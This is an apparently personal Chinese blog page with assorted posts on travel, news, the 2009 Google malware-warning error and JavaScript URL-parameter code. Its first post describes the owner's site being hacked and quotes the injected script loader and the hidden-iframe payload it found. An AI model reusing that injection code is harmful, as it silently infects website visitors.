存在的,即是合理的
May 11
    近段时间,打开电脑第一次访问blog时,卡巴斯基都会报警:"检测到:木马程序 Exploit.HTML.CodeBaseExec URL: http://qy.jr5c.cn/1/19/ccqm.htm"。
    使用firefox(装了NoScript)打开时,noscript拦截到这样的一个脚本:http://%77%77%77%2E%63%6E%76%2E%6F%72%67%2E%63%6E...。
    通过在blog源文件中搜索这个链接,发现images\js\common.js中包含这个这个链接,打开该文件,找到:document.write('<script src=http://%77%77%77%2E%63%6E%76%2E%6F%72%67%2E%63%6E/%70%6F%70%2E%67%69%66></script>'),在ie中打开http://%77%77%77%2E%63%6E%76%2E%6F%72%67%2E%63%6E/%70%6F%70%2E%67%69%66,内容如下:
var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleep");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="cookiesleep=test;expires="+expires.toGMTString();
document.write("<iframe src=http://qy.jr5c.cn/1/19/index.htm?22 width=100 height=0 border=0></iframe>");}

    无疑,被挂马了。
    木马被找到了。向近期访问本站而中毒的朋友表示深深的歉意。
Tags: ,
Mar 19

这个雷啊! 不指定

yemq123 , 19:50 , 见闻感想 , 评论(0) , 引用(0) , 阅读(71) , Via 本站原创
路边一摩托修理店兼卖冷饮。这个实在无语了。懒得评论
Mar 5
    今天,3月5日,QQ群里问:今天是什么日子?很快有回答:惊蛰。
    不错的,今天确实是惊蛰,但还有人记得“雷锋纪念日”吗?雷锋,一个普通的士兵,但也曾今是一种精神的代名词,是一个时代的特征;现在还有多少人会记住呢?
    不久前有这样一则消息:老汉跌倒无人搭救,大喊是我自己跌倒的。老汉为什么这样喊呢?每个人都知道答案,除去对金钱和权力的追逐,这个社会还有了些什么?或许我们每个人都会感慨一番,但感慨过后,有多少人会为此做点什么?
Feb 28

随拍 不指定

yemq123 , 22:04 , 见闻感想 , 评论(0) , 引用(0) , 阅读(92) , Via 本站原创

近期听到不少朋友的出游计划,哎,只能羡慕了,等再忙一阵子或许有时间出去玩玩吧。
其实,只要留心,身边总有很多被忽略的风景。

窗外的芒果花开的正艳。

上班的闲暇时间,拍了一张夜幕中的九江大桥。感觉还可以啊。O(∩_∩)O哈!。

牛年了,衷心希望国家的经济能在全球的危机中一支独秀,特别是股市能够牛起来^-^。

Feb 1

Google的出错 不指定

yemq123 , 15:36 , Web开发 , 评论(0) , 引用(0) , 阅读(123) , Via 本站原创

很多网民也许都发现了在昨日晚(2009.1.31)长达55分钟的时间里,全球范围内的Google搜索结果都会提示用户This site may harm your computer这样的错误信息。Google方面已经对此事做出了官方解释。Google的VP,给出的答案很简单:人为失误。
  Google方面表示他们一直在和一家非盈利组织StopBadware.org合作,通过这个组织给出的名单对各个URL进行有害信息标注。而这个组织的恶意网站名单是通过人工审核并添加的,所以这份名单是人为生成而不是算法生成的。Google每隔一段时间就会去自动检测该组织的名单是否已更新,然后下载回来进行新一轮比对。在昨晚的误报事件中,发生了一件非常不幸的事情,也是整个事件的关键,在Google下载回来的名单里,错误的出现了“/”这个URL。也就是说几乎所有地址都因此原因而被判断为恶意网站。不过令人庆幸的是,Google的维护小组很快就发现并解决了这个问题。

  最后,Google对此事件给各方造成的影响深表抱歉,并感谢大家的理解。


文章来自: 站长网(www.admin5.com) 详文参考:http://www.admin5.com/article/20090201/128133.shtml

然而来自计世网的消息,StopBadware.org确发表了另外的声明:(http://soft.ccw.com.cn/it/htm2009/20090201_582611.shtml

从StopBadware的官方博客中了解到,就在Google对昨晚的网站误报事件做出官方解释后不久,StopBadware.org就立即站出来驳斥Google单方面的解释和说法。在StopBadware的声明中,该组织表示Google的恶意网站名单并不是由他们直接提供,而是Google自己生成了那个出问题的名单。所以责任不应该在该组织一方。

并且由于Google的官方解释一发出后,大量用户希望通过StopBadware网站了解更详细的情况以致于该组织网站流量过大而出现拒绝服务故障。目前,该组织正在全力恢复网站的访问,并希望能够从Google方面得到事件的真相。看来Google此次误报事件还并没有就此结束,我们会一直关注。

到底是谁的过错呢??

Jan 31

店员因胸前手机爆炸当场死亡


转载:大洋网-广州日报

    昨晚7时30分,广州越秀区东华南路联想电脑专卖店内怀疑发生一起手机爆炸事件,店内一名20来岁的外地年轻男子颈部大动脉破裂,当场死亡。附近居民反映,这名男子是该店店员,当时正在店内上班,左胸前口袋内放置的自用手机突然爆炸引起惨剧。手机电池的品牌和来源未能确定,具体情况警方正在调查中。

Jan 8

媒体的力量 不指定

yemq123 , 22:16 , 见闻感想 , 评论(1) , 引用(0) , 阅读(207) , Via 本站原创
由于互联网的发展,如今的媒体越来越强大了。
想法很多,但不想说什么,列举个例子吧:

G325线(即国道325线)九江大桥,2007年6月15日被撞断,目前正在修复建设中。前几天,忽然听说有电视报道今年6月底会通车,上网搜了一下,大部分的报道主要内容是:“交通运输部网站发布信息透露,G325国道九江大桥预计将于2009年6月30日23:59恢复通车”,于是乎,到交通运输部网站搜了到这样一篇报道:

由于G010线广东省佛山市佛开谢边至鹤山水口路段九江大桥(K22+0至K25+0)进行施工养护,于2007年6月15日5:35采取双向封闭,预计2009年6月30日23:59恢复通车。请驾驶员注意沿途设立的绕行、禁行等警告、警示标志,小心驾驶。”

该文说的是“G010线”,并不是“G325线”。好了,看看“G010线”与“G325线”的区别吧:
Jan 4
2009年第一次出游,珠海;
两天的走马观花,也没有怎么想拍东西;
思绪就如同珠海的街头一样,乱;

风筝漂亮吧?是一个风筝贩子在放的。除此之外,没有看到放得更好的。


圆明新园游览推荐路线图,这次是第二次游览了。不知道是不是受金融危机的影响,元旦期间,居然游客寥寥。


大清海战的表演场地。每次去都没有看到表演,这次更是连个人影都难看到。湖旁边的民宅是不是做得很像呢?其实也就一堵墙。


清朝是一个信奉佛教的朝代,连出家的皇帝都有,自己的庭院当然也要有佛了。


当然,既然是皇帝休闲的地方,也要有戏台吧。


Nov 28
这只是演讲的摘要,但同样发人深省,想找完整的版本,却没有找到。
出处:http://blog.readnovel.com/article/htm/tid_1112739.html



“在中国这个发展中国家,你能建10所世界一流大学,那美国有多少所?日本有多少所?现在的实际状况是:世界上前200所大学,中国一所都排不进!在亚洲能排上几所?我到国外去看了以后,感到要将浙大建成世界一流大学就像共产主义理想。”

“以前说‘无知无畏’,现在却是‘无知才无畏’,许多企业把浙江省技术监督局、科委的人请来吃一顿饭、喝一点酒,他就给你签个字,再把我们这些教授胁迫到那里去,给你盖个章,然后就是‘填补国内外空白’、‘国际先进水平’,写论文则是‘国际领先水平的研究成果’、‘首次科学发现’等等,这都是目前非常严重的问题!作为一个大学教授,我深深地为此担忧!这不是我们的责任,是我们的领导无知,是他们倡导了这个主流。我知道在座的处长或老总日子很难过,因为
Nov 4
[原文:http://www.codebit.cn/pub/html/javascript/tip/javascript_get_url_parameter/]

有时我们需要在客户端获取链接参数,一个常见的方法是将链接当做字符串,按照链接的格式分解,然后获取对应的参数值。当然,我们也可以用正则直接匹配。

下面是两个例子

分解链接的方式:
  1. <script type="text/javascript">
  2. <!--
  3. // 说明:Javascript 获取链接(url)参数的方法
  4. // 整理:http://www.CodeBit.cn
  5. function getQueryString(name)
  6. {
  7.     // 如果链接没有参数,或者链接中不存在我们要获取的参数,直接返回空
  8.     if(location.href.indexOf("?")==-1 || location.href.indexOf(name+'=')==-1)
  9.     {
  10.         return '';
  11.     }
  12.     // 获取链接中参数部分
  13.     var queryString = location.href.substring(location.href.indexOf("?")+1);
  14.     // 分离参数对 ?key=value&key2=value2
  15.     var parameters = queryString.split("&");
  16.     var pos, paraName, paraValue;
  17.     for(var i=0; i<parameters.length; i++)
  18.     {
  19.         // 获取等号位置
  20.         pos = parameters[i].indexOf('=');
  21.         if(pos == -1) { continue; }
  22.         // 获取name 和 value
  23.         paraName = parameters[i].substring(0, pos);
  24.         paraValue = parameters[i].substring(pos + 1);
  25.         // 如果查询的name等于当前name,就返回当前值,同时,将链接中的+号还原成空格
  26.         if(paraName == name)
  27.         {
  28.             return unescape(paraValue.replace(/\+/g, " "));
  29.         }
  30.     }
  31.     return '';
  32. };
  33. //http://localhost/test.html?aa=bb&test=cc+dd&ee=ff
  34. alert(getQueryString('test'));
  35. //-->
  36. </script>
用正则匹配的方式:
  1. <script type="text/javascript">
  2. <!--
  3. function getQueryStringRegExp(name)
  4. {
  5.     var reg = new RegExp("(^|\\?|&)"+ name +"=([^&]*)(\\s|&|$)", "i");  
  6.     if (reg.test(location.href)) return unescape(RegExp.$2.replace(/\+/g, " ")); return "";
  7. };
  8. //http://localhost/test.html?aa=bb&test=cc+dd&ee=ff
  9. alert(getQueryStringRegExp('test'));
  10. //-->
  11. </script>
分页: 1/8 第一页 1 2 3 4 5 6 7 8 下页 最后页 [ 显示模式: 摘要 | 列表 ]